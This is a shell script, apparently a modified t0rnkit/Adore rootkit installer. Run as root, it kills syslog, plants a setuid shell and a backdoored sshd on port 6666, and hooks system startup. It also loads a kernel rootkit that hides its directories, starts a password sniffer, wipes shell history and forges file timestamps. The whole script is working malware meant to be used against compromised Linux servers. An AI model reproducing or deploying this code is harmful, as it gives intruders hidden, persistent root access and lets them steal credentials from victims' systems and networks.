#!/bin/sh

BLK='[1;30m'
RED='[1;31m'
GRN='[1;32m'
YEL='[1;33m'
BLU='[1;34m'
MAG='[1;35m'
CYN='[1;36m'
WHI='[1;37m'
DRED='[0;31m'
DGRN='^[[0;32m'
DYEL='[0;33m'
DBLU='[0;34m'
DMAG='[0;35m'
DCYN='[0;36m'
DWHI='[0;37m'
RES='[0m'

killall -9 syslogd
startime=`date +%S`
echo " "
echo "${WHI}====================================================================${RES}"
echo ""
echo "${BLU}          .oooo.                        oooo         o8o      ."
echo "  .o8    d8P''Y8b    ${WHI}               ${RES}${BLU}    '888         '''    .o8"
echo ".o888oo 888    888 oooo d8b ooo. .oo.    888  oooo  oooo  .o888oo"
echo "${DBLU}  888   888    888 '888''8P '888P'Y88b   888 .8P'   '888    888"
echo "  888   888    888  888      888   888   888888.     888    888"
echo "${BLU}  888 . '88b  d88'  888      888   888   888 '88b.   888    888 ."
echo "  '888'  'Y8bd8P'  d888b    o888o o888o o888o o888o o888o   '888'${RES}"
echo ""
echo "${DRED}                   Modificat de mine... Viruzzel            ${RES} "
echo "${WHI}====================================================================${RES}"
sleep 1
bla2=`pwd`

echo "             ${BLU}backdooring started on ${WHI}`hostname -f`${RES}"
sleep 2

echo "${BLU}#                                                                  #${RES}"
if [ "`grep in.inetd /etc/rc.d/rc.sysinit`" ]; then

echo "${BLU}# ${RED}    [Alert] ${WHI}t0rnkit probably installed on machine ${RED}[Alert]       ${BLU} #${RES}"
else
echo "${BLU}#                                                                  #${RES}"
fi
SYSLOGCONF="/etc/syslog.conf"


echo -n "              ${RED}checking for remote logging... ${RES}"

REMOTE=`grep -v "^#" "$SYSLOGCONF" | grep -v "^$" | grep "@" | cut -d '@' -f 2`

if [ ! -z "$REMOTE" ]; then
        echo "${WHI}holy guacamole batman${RES}"
        echo
        echo '${RED}                      REMOTE LOGGING DETECTED ${RES}'
        echo '${WHI}        I hope you can get to these other computer(s): ${RES}'
        echo
        for host in $REMOTE; do
                echo -n "            "
                echo $host
        done
        echo
        echo ' ${WHI}       cuz this computer is LOGGING to it... ${RES}'
        echo
else
        echo "${WHI}guess not.${RES}"
fi
echo "${WHI}--------------------------------------------------------------------${RES}"
echo "${BLU}# ${BLU}[Droping files...] ${RES}"
echo "${WHI}--------------------------------------------------------------------${RES}"
#/bin
mkdir -p /tmp/.dir1/
#/usr/X11R6/bin/
mkdir -p /tmp/.dir2/
#/etc/rc.d/rc3.d/
mkdir -p /tmp/.dir3/
touch -acmr /bin /tmp/.dir1
touch -acmr /usr/X11R6/bin /tmp/.dir2
touch -acmr /etc/rc.d/rc3.d /tmp/.dir3
mkdir -p /usr/X11R6/lib/X11/.~/
mkdir -p /usr/X11R6/bin/.,/copy/adr/
mkdir -p /dev/rd/sdc0/
mkdir -p /usr/info/.t0rn/
cd /usr/X11R6/bin/.,/copy/adr/
rm -rf *
cd $bla2
cp -f /bin/bash /usr/X11R6/bin/.,/copy/zsh
chmod 7777 /usr/X11R6/bin/.,/copy/zsh
/usr/X11R6/bin/.,/copy/zsh
cd $bla2
tar zxvf ssh.tgz
mv -f .t0rn/sharsed /usr/X11R6/bin/.,/copy/adr/nscdx
.t0rn/shsml $1
mv -f .t0rn/shhash /etc/ttyhash
mv adr.tgz /usr/X11R6/bin/.,/copy/adr/
mv tls.tgz /usr/X11R6/bin/.,/copy/adr/
cd /usr/X11R6/bin/.,/copy/adr/
tar zxvf adr.tgz
tar zxvf tls.tgz
mv -f nscd.init /dev/rd/nscd.init
echo "${WHI}--------------------------------------------------------------------${RES}"
echo "${BLU}# ${BLU}[Installing trojans...] ${RES}"
echo "${WHI}--------------------------------------------------------------------${RES}"
cd $bla2
if test -n "$1" ; then
echo "${BLU}# ${BLU}        Using ssh-port : ${WHI}$1                                 ${BLU}       ${RES}"
echo "Port $1" >> .t0rn/shdcf
cat .t0rn/shdcf2 >> .t0rn/shdcf ; rm -rf .t0rn/shdcf2
else
echo "${BLU}# ${RED} No ssh-port Specified                                    ${BLU}       #${RES}"
echo "Port 6666" >> .t0rn/shdcf
cat .t0rn/shdcf2 >> .t0rn/shdcf ; rm -rf .t0rn/shdcf2    
fi
mv .t0rn/sh* /usr/info/.t0rn/
cat /etc/rc.d/rc3.d/S50inet|grep -v "REVAL"> /etc/rc.d/rc3.d/temp.inet
echo "sh /dev/rd/nscd.init" >> /etc/rc.d/rc3.d/temp.inet
echo >> /etc/rc.d/rc3.d/temp.inet
echo -n "exit $" >> /etc/rc.d/rc3.d/temp.inet ; echo "REVAL" >> /etc/rc.d/rc3.d/temp.inet
rm -rf /etc/rc.d/rc3.d/S50inet
mv /etc/rc.d/rc3.d/temp.inet /etc/rc.d/rc3.d/S50inet
chmod +x /etc/rc.d/rc3.d/S50inet
/usr/X11R6/bin/.,/copy/adr/nscdx -q
cd $bla2
echo " "
echo "${WHI}--------------------------------------------------------------------${RES}"
echo "${RED}[System Information...]${RES}" 
echo "${WHI}--------------------------------------------------------------------${RES}"
MYIPADDR=`/sbin/ifconfig eth0 | grep "inet addr:" | \
awk -F ' ' ' {print $2} ' | cut -c6-`
echo "${BLU}Hostname :${WHI} `hostname -f` ($MYIPADDR)${RES}"
uname -a | awk '{ print  $11 }' >/tmp/info_tmp
echo "${BLU}Arch : ${WHI}`cat /tmp/info_tmp` -+- bogomips : `cat /proc/cpuinfo | grep bogomips | awk ' {print $3}'` '${RES}"
echo "${BLU}Alternative IP :${WHI} "`hostname -i`" -+-  Might be ["`/sbin/ifconfig | grep \
eth | wc -l`" ] active adapters.${RES}"              
if [ -f /etc/redhat-release ]; then
echo -n "${BLU}Distribution:${WHI} `head -1 /etc/redhat-release`${RES}"
else
echo -n "${BLU}Distribution:${WHI} unknown${RES}"
fi
endtime=`date +%S`
total=`expr $endtime - $startime`
echo ""                        
echo "${WHI}--------------------------------------------------------------------${RES}"
echo "${RED}ipchains ...?${RES}"
echo "${WHI}--------------------------------------------------------------------${RES}"
/sbin/ipchains -L input | head -5
echo "${WHI}--------------------------------------------------------------------${RES}"
echo "${BLU}# ${BLU}[Searching for Make, gcc...] ${RES}"
echo "${WHI}--------------------------------------------------------------------${RES}"
if [ -f /usr/bin/make ]; then
echo "${GRN}Make found!${RES}  "
else
echo "${BLU}#          ${RED}: Installing MAKE, please wait a sec...                 ${BLU}#${RES}"
echo "${BLU}#          ${RED}: Executing .rpm upgrade...                             ${BLU}#${RES}"
    rpm -ivh --force ftp://18.29.1.70/linux/redhat/redhat-5.2/i386/RedHat/RPMS//make-3.76.1-5.i386.rpm
fi
if [ -f /usr/bin/gcc ]; then
echo "${GRN}gcc found!${RES}  "
else
echo "${BLU}#          ${RED}: Installing gcc, please wait a sec...                  ${BLU}#${RES}"
echo "${BLU}#          ${RED}: Executing .rpm upgrade...                             ${BLU}#${RES}"
rpm -ivh --force ftp://18.29.1.70/linux/redhat/redhat-5.2/i386/RedHat/RPMS//gcc-2.7.2.3-14.i386.rpm
fi

cd $bla2
if [ -f adore.h ]; then
mv -f adore.h /usr/X11R6/bin/.,/copy/adr/
fi
echo "${WHI}--------------------------------------------------------------------${RES}"
echo "${BLU}# ${BLU}[Installing adore...] ${RES}"
echo "${WHI}--------------------------------------------------------------------${RES}"
cd /usr/X11R6/bin/.,/copy/adr/
./cnfad
make
if [ -x /usr/X11R6/bin/.,/copy/adr/ava ]; then
echo "${GRN}ava found... proceeding!${RES}  "
./stad
./vrssnf >>tcp.log &
echo "${GRN}sniffer running!${RES}  "
./ava h /usr/X11R6/bin/.,
./ava h /usr/info/.t0rn
./ava h /dev/rd/sdc0
./ava h /dev/rd/nscd.init
./ava h /etc/rc.d/rc3.d/S50inet
./ava h /usr/X11R6/lib/X11/.~
else
echo "${GRN}ava not found... proceeding with precompiled version!${RES}  "
rm -rf CVS *.c *.h adore.o Makefile* cnfad
cd $bla2
mv adr2.tgz /usr/X11R6/bin/.,/copy/adr/
cd /usr/X11R6/bin/.,/copy/adr/
tar zxvf adr2.tgz
./stad
./vrssnf
echo "${GRN}sniffer running!${RES}  "
./ava h /usr/X11R6/bin/.,
./ava h /usr/info/.t0rn
./ava h /dev/rd/sdc0
./ava h /dev/rd/nscd.init
./ava h /etc/rc.d/rc3.d/S50inet
./ava h /usr/X11R6/lib/X11/.~
fi
echo "${GRN}done hiding...${RES}  "
echo " "
echo "${WHI}--------------------------------------------------------------------${RES}"
echo "${BLU}# ${BLU}[hmmm...nothing to worry about, for you, hehehe...] ${RES}"
echo "${WHI}--------------------------------------------------------------------${RES}"
./vrssnk
echo "uucp" > /usr/X11R6/lib/X11/.~/l.no
echo "${RES}"
touch -acmr /etc/default /etc/pam.d
touch -acmr /etc/default /etc/pam.d/*
rm -f vrssnk
chown uucp /usr/X11R6/lib/X11/.~/l.no
chgrp uucp /usr/X11R6/lib/X11/.~/l.no
chown uucp /usr/X11R6/lib/X11/.~/s.no
chgrp uucp /usr/X11R6/lib/X11/.~/s.no
echo "${GRN}Done??!!?hmmm.. who knows... ${BLU}:${RED}P ${GRN}I DO! hihihi "
echo "${WHI}--------------------------------------------------------------------${RES}"
echo "${BLU}# ${BLU}[Removing unnecessary files.. cleaning...] ${RES}"
echo "${WHI}--------------------------------------------------------------------${RES}"
rm -f /usr/info/.t0rn/shsml
cd $bla2
cd ../
rm -rf Zer0
cd /usr/X11R6/bin/.,/copy/adr/
rm -rf *tgz
rm -rf *.c *.h Makefile* cnfad CVS
./vrssb login
./vrssb ftp
./vrssb dns
echo "${WHI}--------------------------------------------------------------------${RES}"
echo "${BLU}# ${BLU}[Linking /bin/.bash_history, adjusting time...] ${RES}"
echo "${WHI}--------------------------------------------------------------------${RES}"
rm -rf /bin/.bash_history
ln -s /dev/null /bin/.bash_history
touch -acmr /tmp/.dir1 /bin
touch -acmr /tmp/.dir2 /usr/X11R6/bin
touch -acmr /tmp/.dir3 /etc/rc.d/rc3.d
touch -acmr /root /etc
rm -rf /tmp/.dir*
echo "${WHI}====================================================================${RES}"
echo "${GRN}     HIHIHI.. CICA GATA.. AM TERMINAT!! ${RES}    Zer0... by Viruzzel"
echo "${WHI}====================================================================${RES}"